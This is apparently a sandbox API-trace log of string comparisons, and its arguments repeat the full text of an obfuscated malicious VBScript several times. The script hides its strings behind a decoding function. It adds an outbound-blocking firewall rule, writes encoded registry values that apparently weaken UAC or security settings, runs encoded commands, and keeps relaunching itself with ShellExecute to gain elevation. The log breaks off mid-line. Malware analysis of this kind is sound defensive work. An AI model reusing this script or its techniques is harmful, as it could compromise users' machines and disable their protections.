CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.989] wcsncmp (_String1=" CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.989] wcsncmp (_String1="CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0222.989] wcsncmp (_String1="reateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.989] wcsncmp (_String1="eateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 